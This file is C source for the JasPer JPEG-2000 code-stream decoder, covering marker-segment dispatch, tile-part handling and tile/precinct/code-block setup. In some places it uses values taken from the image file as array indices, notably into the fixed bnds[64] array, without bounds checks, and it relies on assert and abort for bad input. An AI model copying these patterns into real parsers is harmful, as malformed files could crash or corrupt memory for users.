* "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING
* BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A
* PARTICULAR PURPOSE AND NONINFRINGEMENT OF THIRD PARTY RIGHTS. IN NO
* EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, OR ANY SPECIAL
* INDIRECT OR CONSEQUENTIAL DAMAGES, OR ANY DAMAGES WHATSOEVER RESULTING
* FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT,
* NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION
* WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. NO ASSURANCES ARE
* PROVIDED BY THE COPYRIGHT HOLDERS THAT THE SOFTWARE DOES NOT INFRINGE
* THE PATENT OR OTHER INTELLECTUAL PROPERTY RIGHTS OF ANY OTHER ENTITY.
* EACH COPYRIGHT HOLDER DISCLAIMS ANY LIABILITY TO THE USER FOR CLAIMS
* BROUGHT BY ANY OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL
* PROPERTY RIGHTS OR OTHERWISE. AS A CONDITION TO EXERCISING THE RIGHTS
* GRANTED HEREUNDER, EACH USER HEREBY ASSUMES SOLE RESPONSIBILITY TO SECURE
* ANY OTHER INTELLECTUAL PROPERTY RIGHTS NEEDED, IF ANY. THE SOFTWARE
* IS NOT FAULT-TOLERANT AND IS NOT INTENDED FOR USE IN MISSION-CRITICAL
* SYSTEMS, SUCH AS THOSE USED IN THE OPERATION OF NUCLEAR FACILITIES,
* AIRCRAFT NAVIGATION OR COMMUNICATION SYSTEMS, AIR TRAFFIC CONTROL
* SYSTEMS, DIRECT LIFE SUPPORT MACHINES, OR WEAPONS SYSTEMS, IN WHICH
* THE FAILURE OF THE SOFTWARE OR SYSTEM COULD LEAD DIRECTLY TO DEATH,
* PERSONAL INJURY, OR SEVERE PHYSICAL OR ENVIRONMENTAL DAMAGE ("HIGH
* RISK ACTIVITIES"). THE COPYRIGHT HOLDERS SPECIFICALLY DISCLAIM ANY
* EXPRESS OR IMPLIED WARRANTY OF FITNESS FOR HIGH RISK ACTIVITIES.
*
* __END_OF_JASPER_LICENSE__
*/
/*
* $Id$
*/
/******************************************************************************\
* Includes.
\******************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <inttypes.h>
#include "jasper/jas_types.h"
#include "jasper/jas_math.h"
#include "jasper/jas_tvp.h"
#include "jasper/jas_malloc.h"
#include "jasper/jas_debug.h"
#include "jpc_fix.h"
#include "jpc_dec.h"
#include "jpc_cs.h"
#include "jpc_mct.h"
#include "jpc_t2dec.h"
#include "jpc_t1dec.h"
#include "jpc_math.h"
/******************************************************************************\
*
\******************************************************************************/
#define JPC_MHSOC 0x0001
/* In the main header, expecting a SOC marker segment. */
#define JPC_MHSIZ 0x0002
/* In the main header, expecting a SIZ marker segment. */
#define JPC_MH 0x0004
/* In the main header, expecting "other" marker segments. */
#define JPC_TPHSOT 0x0008
/* In a tile-part header, expecting a SOT marker segment. */
#define JPC_TPH 0x0010
/* In a tile-part header, expecting "other" marker segments. */
#define JPC_MT 0x0020
/* In the main trailer. */
typedef struct {
uint_fast16_t id;
/* The marker segment type. */
int validstates;
/* The states in which this type of marker segment can be
validly encountered. */
int (*action)(jpc_dec_t *dec, jpc_ms_t *ms);
/* The action to take upon encountering this type of marker segment. */
} jpc_dec_mstabent_t;
/******************************************************************************\
*
\******************************************************************************/
/* COD/COC parameters have been specified. */
#define JPC_CSET 0x0001
/* QCD/QCC parameters have been specified. */
#define JPC_QSET 0x0002
/* COD/COC parameters set from a COC marker segment. */
#define JPC_COC 0x0004
/* QCD/QCC parameters set from a QCC marker segment. */
#define JPC_QCC 0x0008
/******************************************************************************\
* Local function prototypes.
\******************************************************************************/
static int jpc_dec_dump(jpc_dec_t *dec, FILE *out);
jpc_ppxstab_t *jpc_ppxstab_create(void);
void jpc_ppxstab_destroy(jpc_ppxstab_t *tab);
int jpc_ppxstab_grow(jpc_ppxstab_t *tab, int maxents);
int jpc_ppxstab_insert(jpc_ppxstab_t *tab, jpc_ppxstabent_t *ent);
jpc_streamlist_t *jpc_ppmstabtostreams(jpc_ppxstab_t *tab);
int jpc_pptstabwrite(jas_stream_t *out, jpc_ppxstab_t *tab);
jpc_ppxstabent_t *jpc_ppxstabent_create(void);
void jpc_ppxstabent_destroy(jpc_ppxstabent_t *ent);
int jpc_streamlist_numstreams(jpc_streamlist_t *streamlist);
jpc_streamlist_t *jpc_streamlist_create(void);
int jpc_streamlist_insert(jpc_streamlist_t *streamlist, int streamno,
jas_stream_t *stream);
jas_stream_t *jpc_streamlist_remove(jpc_streamlist_t *streamlist, int streamno);
void jpc_streamlist_destroy(jpc_streamlist_t *streamlist);
jas_stream_t *jpc_streamlist_get(jpc_streamlist_t *streamlist, int streamno);
static void jpc_dec_cp_resetflags(jpc_dec_cp_t *cp);
static jpc_dec_cp_t *jpc_dec_cp_create(uint_fast16_t numcomps);
static int jpc_dec_cp_isvalid(jpc_dec_cp_t *cp);
static jpc_dec_cp_t *jpc_dec_cp_copy(jpc_dec_cp_t *cp);
static int jpc_dec_cp_setfromcod(jpc_dec_cp_t *cp, jpc_cod_t *cod);
static int jpc_dec_cp_setfromcoc(jpc_dec_cp_t *cp, jpc_coc_t *coc);
static int jpc_dec_cp_setfromcox(jpc_dec_cp_t *cp, jpc_dec_ccp_t *ccp,
jpc_coxcp_t *compparms, int flags);
static int jpc_dec_cp_setfromqcd(jpc_dec_cp_t *cp, jpc_qcd_t *qcd);
static int jpc_dec_cp_setfromqcc(jpc_dec_cp_t *cp, jpc_qcc_t *qcc);
static int jpc_dec_cp_setfromqcx(jpc_dec_cp_t *cp, jpc_dec_ccp_t *ccp,
jpc_qcxcp_t *compparms, int flags);
static int jpc_dec_cp_setfromrgn(jpc_dec_cp_t *cp, jpc_rgn_t *rgn);
static int jpc_dec_cp_prepare(jpc_dec_cp_t *cp);
static void jpc_dec_cp_destroy(jpc_dec_cp_t *cp);
static int jpc_dec_cp_setfrompoc(jpc_dec_cp_t *cp, jpc_poc_t *poc, int reset);
static int jpc_pi_addpchgfrompoc(jpc_pi_t *pi, jpc_poc_t *poc);
static int jpc_dec_decode(jpc_dec_t *dec);
static jpc_dec_t *jpc_dec_create(jpc_dec_importopts_t *impopts, jas_stream_t *in);
static void jpc_dec_destroy(jpc_dec_t *dec);
static void jpc_dequantize(jas_matrix_t *x, jpc_fix_t absstepsize);
static void jpc_undo_roi(jas_matrix_t *x, int roishift, int bgshift, int numbps);
static jpc_fix_t jpc_calcabsstepsize(int stepsize, int numbits);
static int jpc_dec_tiledecode(jpc_dec_t *dec, jpc_dec_tile_t *tile);
static int jpc_dec_tileinit(jpc_dec_t *dec, jpc_dec_tile_t *tile);
static int jpc_dec_tilefini(jpc_dec_t *dec, jpc_dec_tile_t *tile);
static int jpc_dec_process_soc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_sot(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_sod(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_eoc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_siz(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_cod(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_coc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_rgn(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_qcd(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_qcc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_poc(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_ppm(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_ppt(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_com(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_unk(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_process_crg(jpc_dec_t *dec, jpc_ms_t *ms);
static int jpc_dec_parseopts(char *optstr, jpc_dec_importopts_t *opts);
static jpc_dec_mstabent_t *jpc_dec_mstab_lookup(uint_fast16_t id);
/******************************************************************************\
* Global data.
\******************************************************************************/
jpc_dec_mstabent_t jpc_dec_mstab[] = {
{JPC_MS_SOC, JPC_MHSOC, jpc_dec_process_soc},
{JPC_MS_SOT, JPC_MH | JPC_TPHSOT, jpc_dec_process_sot},
{JPC_MS_SOD, JPC_TPH, jpc_dec_process_sod},
{JPC_MS_EOC, JPC_TPHSOT, jpc_dec_process_eoc},
{JPC_MS_SIZ, JPC_MHSIZ, jpc_dec_process_siz},
{JPC_MS_COD, JPC_MH | JPC_TPH, jpc_dec_process_cod},
{JPC_MS_COC, JPC_MH | JPC_TPH, jpc_dec_process_coc},
{JPC_MS_RGN, JPC_MH | JPC_TPH, jpc_dec_process_rgn},
{JPC_MS_QCD, JPC_MH | JPC_TPH, jpc_dec_process_qcd},
{JPC_MS_QCC, JPC_MH | JPC_TPH, jpc_dec_process_qcc},
{JPC_MS_POC, JPC_MH | JPC_TPH, jpc_dec_process_poc},
{JPC_MS_TLM, JPC_MH, 0},
{JPC_MS_PLM, JPC_MH, 0},
{JPC_MS_PLT, JPC_TPH, 0},
{JPC_MS_PPM, JPC_MH, jpc_dec_process_ppm},
{JPC_MS_PPT, JPC_TPH, jpc_dec_process_ppt},
{JPC_MS_SOP, 0, 0},
{JPC_MS_CRG, JPC_MH, jpc_dec_process_crg},
{JPC_MS_COM, JPC_MH | JPC_TPH, jpc_dec_process_com},
{0, JPC_MH | JPC_TPH, jpc_dec_process_unk}
};
/******************************************************************************\
* The main entry point for the JPEG-2000 decoder.
\******************************************************************************/
jas_image_t *jpc_decode(jas_stream_t *in, char *optstr)
{
jpc_dec_importopts_t opts;
jpc_dec_t *dec;
jas_image_t *image;
dec = 0;
if (jpc_dec_parseopts(optstr, &opts)) {
goto error;
}
jpc_initluts();
if (!(dec = jpc_dec_create(&opts, in))) {
goto error;
}
/* Do most of the work. */
if (jpc_dec_decode(dec)) {
goto error;
}
if (jas_image_numcmpts(dec->image) >= 3) {
jas_image_setclrspc(dec->image, JAS_CLRSPC_SRGB);
jas_image_setcmpttype(dec->image, 0,
JAS_IMAGE_CT_COLOR(JAS_CLRSPC_CHANIND_RGB_R));
jas_image_setcmpttype(dec->image, 1,
JAS_IMAGE_CT_COLOR(JAS_CLRSPC_CHANIND_RGB_G));
jas_image_setcmpttype(dec->image, 2,
JAS_IMAGE_CT_COLOR(JAS_CLRSPC_CHANIND_RGB_B));
} else {
jas_image_setclrspc(dec->image, JAS_CLRSPC_SGRAY);
jas_image_setcmpttype(dec->image, 0,
JAS_IMAGE_CT_COLOR(JAS_CLRSPC_CHANIND_GRAY_Y));
}
/* Save the return value. */
image = dec->image;
/* Stop the image from being discarded. */
dec->image = 0;
/* Destroy decoder. */
jpc_dec_destroy(dec);
return image;
error:
if (dec) {
jpc_dec_destroy(dec);
}
return 0;
}
typedef enum {
OPT_MAXLYRS,
OPT_MAXPKTS,
OPT_DEBUG
} optid_t;
jas_taginfo_t decopts[] = {
{OPT_MAXLYRS, "maxlyrs"},
{OPT_MAXPKTS, "maxpkts"},
{OPT_DEBUG, "debug"},
{-1, 0}
};
static int jpc_dec_parseopts(char *optstr, jpc_dec_importopts_t *opts)
{
jas_tvparser_t *tvp;
opts->debug = 0;
opts->maxlyrs = JPC_MAXLYRS;
opts->maxpkts = -1;
if (!(tvp = jas_tvparser_create(optstr ? optstr : ""))) {
return -1;
}
while (!jas_tvparser_next(tvp)) {
switch (jas_taginfo_nonull(jas_taginfos_lookup(decopts,
jas_tvparser_gettag(tvp)))->id) {
case OPT_MAXLYRS:
opts->maxlyrs = atoi(jas_tvparser_getval(tvp));
break;
case OPT_DEBUG:
opts->debug = atoi(jas_tvparser_getval(tvp));
break;
case OPT_MAXPKTS:
opts->maxpkts = atoi(jas_tvparser_getval(tvp));
break;
default:
jas_eprintf("warning: ignoring invalid option %s\n",
jas_tvparser_gettag(tvp));
break;
}
}
jas_tvparser_destroy(tvp);
return 0;
}
/******************************************************************************\
* Code for table-driven code stream decoder.
\******************************************************************************/
static jpc_dec_mstabent_t *jpc_dec_mstab_lookup(uint_fast16_t id)
{
jpc_dec_mstabent_t *mstabent;
for (mstabent = jpc_dec_mstab; mstabent->id != 0; ++mstabent) {
if (mstabent->id == id) {
break;
}
}
return mstabent;
}
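/*
 * Main decoding loop: read marker segments from the code stream one at a
 * time, check that each is allowed in the current decoder state, and dispatch
 * it to the handler registered in jpc_dec_mstab[]. A positive return value
 * from a handler (the EOC handler) ends the loop successfully.
 */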
static int jpc_dec_decode(jpc_dec_t *dec)
{
jpc_ms_t *ms;
jpc_dec_mstabent_t *mstabent;
int ret;
jpc_cstate_t *cstate;
if (!(cstate = jpc_cstate_create())) {
return -1;
}
dec->cstate = cstate;
/* Initially, we should expect to encounter a SOC marker segment. */
dec->state = JPC_MHSOC;
for (;;) {
/* Get the next marker segment in the code stream. */
if (!(ms = jpc_getms(dec->in, cstate))) {
jas_eprintf("cannot get marker segment\n");
return -1;
}
mstabent = jpc_dec_mstab_lookup(ms->id);
assert(mstabent);
/* Ensure that this type of marker segment is permitted
at this point in the code stream. */
if (!(dec->state & mstabent->validstates)) {
jas_eprintf("unexpected marker segment type\n");
jpc_ms_destroy(ms);
return -1;
}
/* Process the marker segment. */
if (mstabent->action) {
ret = (*mstabent->action)(dec, ms);
} else {
/* No explicit action is required. */
ret = 0;
}
/* Destroy the marker segment. */
jpc_ms_destroy(ms);
if (ret < 0) {
return -1;
} else if (ret > 0) {
break;
}
}
return 0;
}
static int jpc_dec_process_crg(jpc_dec_t *dec, jpc_ms_t *ms)
{
int cmptno;
jpc_dec_cmpt_t *cmpt;
jpc_crg_t *crg;
crg = &ms->parms.crg;
for (cmptno = 0, cmpt = dec->cmpts; cmptno < dec->numcomps; ++cmptno,
++cmpt) {
		/* Ignore the information in the CRG marker segment for now.
		  This information serves no useful purpose for decoding anyway.
		  Other parts of the code would need to be changed if these lines
		  were uncommented.
		cmpt->hsubstep = crg->comps[cmptno].hoff;
		cmpt->vsubstep = crg->comps[cmptno].voff;
		*/
}
return 0;
}
static int jpc_dec_process_soc(jpc_dec_t *dec, jpc_ms_t *ms)
{
/* Eliminate warnings about unused variables. */
ms = 0;
/* We should expect to encounter a SIZ marker segment next. */
dec->state = JPC_MHSIZ;
return 0;
}
static int jpc_dec_process_sot(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_dec_tile_t *tile;
jpc_sot_t *sot = &ms->parms.sot;
jas_image_cmptparm_t *compinfos;
jas_image_cmptparm_t *compinfo;
jpc_dec_cmpt_t *cmpt;
int cmptno;
if (dec->state == JPC_MH) {
if (!(compinfos = jas_alloc2(dec->numcomps,
sizeof(jas_image_cmptparm_t)))) {
abort();
}
for (cmptno = 0, cmpt = dec->cmpts, compinfo = compinfos;
cmptno < dec->numcomps; ++cmptno, ++cmpt, ++compinfo) {
compinfo->tlx = 0;
compinfo->tly = 0;
compinfo->prec = cmpt->prec;
compinfo->sgnd = cmpt->sgnd;
compinfo->width = cmpt->width;
compinfo->height = cmpt->height;
compinfo->hstep = cmpt->hstep;
compinfo->vstep = cmpt->vstep;
}
if (!(dec->image = jas_image_create(dec->numcomps, compinfos,
JAS_CLRSPC_UNKNOWN))) {
jas_free(compinfos);
return -1;
}
jas_free(compinfos);
/* Is the packet header information stored in PPM marker segments in
the main header? */
if (dec->ppmstab) {
/* Convert the PPM marker segment data into a collection of streams
(one stream per tile-part). */
if (!(dec->pkthdrstreams = jpc_ppmstabtostreams(dec->ppmstab))) {
abort();
}
jpc_ppxstab_destroy(dec->ppmstab);
dec->ppmstab = 0;
}
}
if (sot->len > 0) {
dec->curtileendoff = jas_stream_getrwcount(dec->in) - ms->len -
4 + sot->len;
} else {
dec->curtileendoff = 0;
}
if (JAS_CAST(int, sot->tileno) >= dec->numtiles) {
jas_eprintf("invalid tile number in SOT marker segment\n");
return -1;
}
/* Set the current tile. */
dec->curtile = &dec->tiles[sot->tileno];
tile = dec->curtile;
/* Ensure that this is the expected part number. */
if (sot->partno != tile->partno) {
return -1;
}
if (tile->numparts > 0 && sot->partno >= tile->numparts) {
return -1;
}
if (!tile->numparts && sot->numparts > 0) {
tile->numparts = sot->numparts;
}
tile->pptstab = 0;
switch (tile->state) {
case JPC_TILE_INIT:
/* This is the first tile-part for this tile. */
tile->state = JPC_TILE_ACTIVE;
assert(!tile->cp);
if (!(tile->cp = jpc_dec_cp_copy(dec->cp))) {
return -1;
}
jpc_dec_cp_resetflags(dec->cp);
break;
default:
if (sot->numparts == sot->partno - 1) {
tile->state = JPC_TILE_ACTIVELAST;
}
break;
}
/* Note: We do not increment the expected tile-part number until
all processing for this tile-part is complete. */
/* We should expect to encounter other tile-part header marker
segments next. */
dec->state = JPC_TPH;
return 0;
}
static int jpc_dec_process_sod(jpc_dec_t *dec, jpc_ms_t *ms)
{
jpc_dec_tile_t *tile;
int pos;
/* Eliminate compiler warnings about unused variables. */
ms = 0;
if (!(tile = dec->curtile)) {
return -1;
}
if (!tile->partno) {
if (!jpc_dec_cp_isvalid(tile->cp)) {
return -1;
}
jpc_dec_cp_prepare(tile->cp);
if (jpc_dec_tileinit(dec, tile)) {
return -1;
}
}
/* Are packet headers stored in the main header or tile-part header? */
if (dec->pkthdrstreams) {
/* Get the stream containing the packet header data for this
tile-part. */
if (!(tile->pkthdrstream = jpc_streamlist_remove(dec->pkthdrstreams, 0))) {
return -1;
}
}
if (tile->pptstab) {
if (!tile->pkthdrstream) {
if (!(tile->pkthdrstream = jas_stream_memopen(0, 0))) {
return -1;
}
}
pos = jas_stream_tell(tile->pkthdrstream);
jas_stream_seek(tile->pkthdrstream, 0, SEEK_END);
if (jpc_pptstabwrite(tile->pkthdrstream, tile->pptstab)) {
return -1;
}
jas_stream_seek(tile->pkthdrstream, pos, SEEK_SET);
jpc_ppxstab_destroy(tile->pptstab);
tile->pptstab = 0;
}
if (jas_getdbglevel() >= 10) {
jpc_dec_dump(dec, stderr);
}
if (jpc_dec_decodepkts(dec, (tile->pkthdrstream) ? tile->pkthdrstream :
dec->in, dec->in)) {
jas_eprintf("jpc_dec_decodepkts failed\n");
return -1;
}
/* Gobble any unconsumed tile data. */
if (dec->curtileendoff > 0) {
long curoff;
uint_fast32_t n;
curoff = jas_stream_getrwcount(dec->in);
if (curoff < dec->curtileendoff) {
n = dec->curtileendoff - curoff;
jas_eprintf("warning: ignoring trailing garbage (%lu bytes)\n",
(unsigned long) n);
while (n-- > 0) {
if (jas_stream_getc(dec->in) == EOF) {
jas_eprintf("read error\n");
return -1;
}
}
} else if (curoff > dec->curtileendoff) {
jas_eprintf("warning: not enough tile data (%lu bytes)\n",
(unsigned long) curoff - dec->curtileendoff);
}
}
if (tile->numparts > 0 && tile->partno == tile->numparts - 1) {
if (jpc_dec_tiledecode(dec, tile)) {
return -1;
}
jpc_dec_tilefini(dec, tile);
}
dec->curtile = 0;
/* Increment the expected tile-part number. */
++tile->partno;
/* We should expect to encounter a SOT marker segment next. */
dec->state = JPC_TPHSOT;
return 0;
}
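/*
 * Build the per-tile decoding state: for each component, allocate the
 * resolution levels, bands, precincts, and code blocks implied by the coding
 * parameters, bind the band and code-block sample buffers to subregions of
 * the component data, and finally create and initialize the packet iterator.
 */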
static int jpc_dec_tileinit(jpc_dec_t *dec, jpc_dec_tile_t *tile)
{
jpc_dec_tcomp_t *tcomp;
int compno;
int rlvlno;
jpc_dec_rlvl_t *rlvl;
jpc_dec_band_t *band;
jpc_dec_prc_t *prc;
int bndno;
jpc_tsfb_band_t *bnd;
int bandno;
jpc_dec_ccp_t *ccp;
int prccnt;
jpc_dec_cblk_t *cblk;
int cblkcnt;
uint_fast32_t tlprcxstart;
uint_fast32_t tlprcystart;
uint_fast32_t brprcxend;
uint_fast32_t brprcyend;
uint_fast32_t tlcbgxstart;
uint_fast32_t tlcbgystart;
uint_fast32_t brcbgxend;
uint_fast32_t brcbgyend;
uint_fast32_t cbgxstart;
uint_fast32_t cbgystart;
uint_fast32_t cbgxend;
uint_fast32_t cbgyend;
uint_fast32_t tlcblkxstart;
uint_fast32_t tlcblkystart;
uint_fast32_t brcblkxend;
uint_fast32_t brcblkyend;
uint_fast32_t cblkxstart;
uint_fast32_t cblkystart;
uint_fast32_t cblkxend;
uint_fast32_t cblkyend;
uint_fast32_t tmpxstart;
uint_fast32_t tmpystart;
uint_fast32_t tmpxend;
uint_fast32_t tmpyend;
jpc_dec_cp_t *cp;
jpc_tsfb_band_t bnds[64];
jpc_pchg_t *pchg;
int pchgno;
jpc_dec_cmpt_t *cmpt;
cp = tile->cp;
tile->realmode = 0;
if (cp->mctid == JPC_MCT_ICT) {
tile->realmode = 1;
}
for (compno = 0, tcomp = tile->tcomps, cmpt = dec->cmpts; compno <
dec->numcomps; ++compno, ++tcomp, ++cmpt) {
ccp = &tile->cp->ccps[compno];
if (ccp->qmfbid == JPC_COX_INS) {
tile->realmode = 1;
}
tcomp->numrlvls = ccp->numrlvls;
if (!(tcomp->rlvls = jas_alloc2(tcomp->numrlvls,
sizeof(jpc_dec_rlvl_t)))) {
return -1;
}
if (!(tcomp->data = jas_seq2d_create(JPC_CEILDIV(tile->xstart,
cmpt->hstep), JPC_CEILDIV(tile->ystart, cmpt->vstep),
JPC_CEILDIV(tile->xend, cmpt->hstep), JPC_CEILDIV(tile->yend,
cmpt->vstep)))) {
return -1;
}
if (!(tcomp->tsfb = jpc_cod_gettsfb(ccp->qmfbid,
tcomp->numrlvls - 1))) {
return -1;
}
{
jpc_tsfb_getbands(tcomp->tsfb, jas_seq2d_xstart(tcomp->data),
jas_seq2d_ystart(tcomp->data), jas_seq2d_xend(tcomp->data),
jas_seq2d_yend(tcomp->data), bnds);
}
for (rlvlno = 0, rlvl = tcomp->rlvls; rlvlno < tcomp->numrlvls;
++rlvlno, ++rlvl) {
rlvl->bands = 0;
rlvl->xstart = JPC_CEILDIVPOW2(tcomp->xstart,
tcomp->numrlvls - 1 - rlvlno);
rlvl->ystart = JPC_CEILDIVPOW2(tcomp->ystart,
tcomp->numrlvls - 1 - rlvlno);
rlvl->xend = JPC_CEILDIVPOW2(tcomp->xend,
tcomp->numrlvls - 1 - rlvlno);
rlvl->yend = JPC_CEILDIVPOW2(tcomp->yend,
tcomp->numrlvls - 1 - rlvlno);
rlvl->prcwidthexpn = ccp->prcwidthexpns[rlvlno];
rlvl->prcheightexpn = ccp->prcheightexpns[rlvlno];
tlprcxstart = JPC_FLOORDIVPOW2(rlvl->xstart,
rlvl->prcwidthexpn) << rlvl->prcwidthexpn;
tlprcystart = JPC_FLOORDIVPOW2(rlvl->ystart,
rlvl->prcheightexpn) << rlvl->prcheightexpn;
brprcxend = JPC_CEILDIVPOW2(rlvl->xend,
rlvl->prcwidthexpn) << rlvl->prcwidthexpn;
brprcyend = JPC_CEILDIVPOW2(rlvl->yend,
rlvl->prcheightexpn) << rlvl->prcheightexpn;
rlvl->numhprcs = (brprcxend - tlprcxstart) >>
rlvl->prcwidthexpn;
rlvl->numvprcs = (brprcyend - tlprcystart) >>
rlvl->prcheightexpn;
rlvl->numprcs = rlvl->numhprcs * rlvl->numvprcs;
if (rlvl->xstart >= rlvl->xend || rlvl->ystart >= rlvl->yend) {
rlvl->bands = 0;
rlvl->numprcs = 0;
rlvl->numhprcs = 0;
rlvl->numvprcs = 0;
continue;
}
if (!rlvlno) {
tlcbgxstart = tlprcxstart;
tlcbgystart = tlprcystart;
brcbgxend = brprcxend;
brcbgyend = brprcyend;
rlvl->cbgwidthexpn = rlvl->prcwidthexpn;
rlvl->cbgheightexpn = rlvl->prcheightexpn;
} else {
tlcbgxstart = JPC_CEILDIVPOW2(tlprcxstart, 1);
tlcbgystart = JPC_CEILDIVPOW2(tlprcystart, 1);
brcbgxend = JPC_CEILDIVPOW2(brprcxend, 1);
brcbgyend = JPC_CEILDIVPOW2(brprcyend, 1);
rlvl->cbgwidthexpn = rlvl->prcwidthexpn - 1;
rlvl->cbgheightexpn = rlvl->prcheightexpn - 1;
}
rlvl->cblkwidthexpn = JAS_MIN(ccp->cblkwidthexpn,
rlvl->cbgwidthexpn);
rlvl->cblkheightexpn = JAS_MIN(ccp->cblkheightexpn,
rlvl->cbgheightexpn);
rlvl->numbands = (!rlvlno) ? 1 : 3;
if (!(rlvl->bands = jas_alloc2(rlvl->numbands,
sizeof(jpc_dec_band_t)))) {
return -1;
}
for (bandno = 0, band = rlvl->bands;
bandno < rlvl->numbands; ++bandno, ++band) {
bndno = (!rlvlno) ? 0 : (3 * (rlvlno - 1) +
bandno + 1);
bnd = &bnds[bndno];
band->orient = bnd->orient;
band->stepsize = ccp->stepsizes[bndno];
band->analgain = JPC_NOMINALGAIN(ccp->qmfbid,
tcomp->numrlvls - 1, rlvlno, band->orient);
band->absstepsize = jpc_calcabsstepsize(band->stepsize,
cmpt->prec + band->analgain);
band->numbps = ccp->numguardbits +
JPC_QCX_GETEXPN(band->stepsize) - 1;
band->roishift = (ccp->roishift + band->numbps >= JPC_PREC) ?
(JPC_PREC - 1 - band->numbps) : ccp->roishift;
band->data = 0;
band->prcs = 0;
if (bnd->xstart == bnd->xend || bnd->ystart == bnd->yend) {
continue;
}
if (!(band->data = jas_seq2d_create(0, 0, 0, 0))) {
return -1;
}
jas_seq2d_bindsub(band->data, tcomp->data, bnd->locxstart,
bnd->locystart, bnd->locxend, bnd->locyend);
jas_seq2d_setshift(band->data, bnd->xstart, bnd->ystart);
assert(rlvl->numprcs);
if (!(band->prcs = jas_alloc2(rlvl->numprcs,
sizeof(jpc_dec_prc_t)))) {
return -1;
}
/************************************************/
cbgxstart = tlcbgxstart;
cbgystart = tlcbgystart;
for (prccnt = rlvl->numprcs, prc = band->prcs;
prccnt > 0; --prccnt, ++prc) {
cbgxend = cbgxstart + (1 << rlvl->cbgwidthexpn);
cbgyend = cbgystart + (1 << rlvl->cbgheightexpn);
prc->xstart = JAS_MAX(cbgxstart, JAS_CAST(uint_fast32_t,
jas_seq2d_xstart(band->data)));
prc->ystart = JAS_MAX(cbgystart, JAS_CAST(uint_fast32_t,
jas_seq2d_ystart(band->data)));
prc->xend = JAS_MIN(cbgxend, JAS_CAST(uint_fast32_t,
jas_seq2d_xend(band->data)));
prc->yend = JAS_MIN(cbgyend, JAS_CAST(uint_fast32_t,
jas_seq2d_yend(band->data)));
if (prc->xend > prc->xstart && prc->yend > prc->ystart) {
tlcblkxstart = JPC_FLOORDIVPOW2(prc->xstart,
rlvl->cblkwidthexpn) << rlvl->cblkwidthexpn;
tlcblkystart = JPC_FLOORDIVPOW2(prc->ystart,
rlvl->cblkheightexpn) << rlvl->cblkheightexpn;
brcblkxend = JPC_CEILDIVPOW2(prc->xend,
rlvl->cblkwidthexpn) << rlvl->cblkwidthexpn;
brcblkyend = JPC_CEILDIVPOW2(prc->yend,
rlvl->cblkheightexpn) << rlvl->cblkheightexpn;
prc->numhcblks = (brcblkxend - tlcblkxstart) >>
rlvl->cblkwidthexpn;
prc->numvcblks = (brcblkyend - tlcblkystart) >>
rlvl->cblkheightexpn;
prc->numcblks = prc->numhcblks * prc->numvcblks;
assert(prc->numcblks > 0);
if (!(prc->incltagtree = jpc_tagtree_create(
prc->numhcblks, prc->numvcblks))) {
return -1;
}
if (!(prc->numimsbstagtree = jpc_tagtree_create(
prc->numhcblks, prc->numvcblks))) {
return -1;
}
if (!(prc->cblks = jas_alloc2(prc->numcblks,
sizeof(jpc_dec_cblk_t)))) {
return -1;
}
cblkxstart = cbgxstart;
cblkystart = cbgystart;
for (cblkcnt = prc->numcblks, cblk = prc->cblks; cblkcnt > 0;) {
cblkxend = cblkxstart + (1 << rlvl->cblkwidthexpn);
cblkyend = cblkystart + (1 << rlvl->cblkheightexpn);
tmpxstart = JAS_MAX(cblkxstart, prc->xstart);
tmpystart = JAS_MAX(cblkystart, prc->ystart);
tmpxend = JAS_MIN(cblkxend, prc->xend);
tmpyend = JAS_MIN(cblkyend, prc->yend);
if (tmpxend > tmpxstart && tmpyend > tmpystart) {
cblk->firstpassno = -1;
cblk->mqdec = 0;
cblk->nulldec = 0;
cblk->flags = 0;
cblk->numpasses = 0;
cblk->segs.head = 0;
cblk->segs.tail = 0;
cblk->curseg = 0;
cblk->numimsbs = 0;
cblk->numlenbits = 3;
cblk->flags = 0;
if (!(cblk->data = jas_seq2d_create(0, 0, 0, 0))) {
return -1;
}
jas_seq2d_bindsub(cblk->data, band->data,
tmpxstart, tmpystart, tmpxend, tmpyend);
++cblk;
--cblkcnt;
}
cblkxstart += 1 << rlvl->cblkwidthexpn;
if (cblkxstart >= cbgxend) {
cblkxstart = cbgxstart;
cblkystart += 1 << rlvl->cblkheightexpn;
}
}
} else {
prc->cblks = 0;
prc->incltagtree = 0;
prc->numimsbstagtree = 0;
}
cbgxstart += 1 << rlvl->cbgwidthexpn;
if (cbgxstart >= brcbgxend) {
cbgxstart = tlcbgxstart;
cbgystart += 1 << rlvl->cbgheightexpn;
}
}
/********************************************/
}
}
}
if (!(tile->pi = jpc_dec_pi_create(dec, tile))) {
return -1;
}
for (pchgno = 0; pchgno < jpc_pchglist_numpchgs(tile->cp->pchglist);
++pchgno) {
pchg = jpc_pchg_copy(jpc_pchglist_get(tile->cp->pchglist, pchgno));
assert(pchg);
jpc_pi_addpchg(tile->pi, pchg);
}
jpc_pi_init(tile->pi);
return 0;
}
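/*
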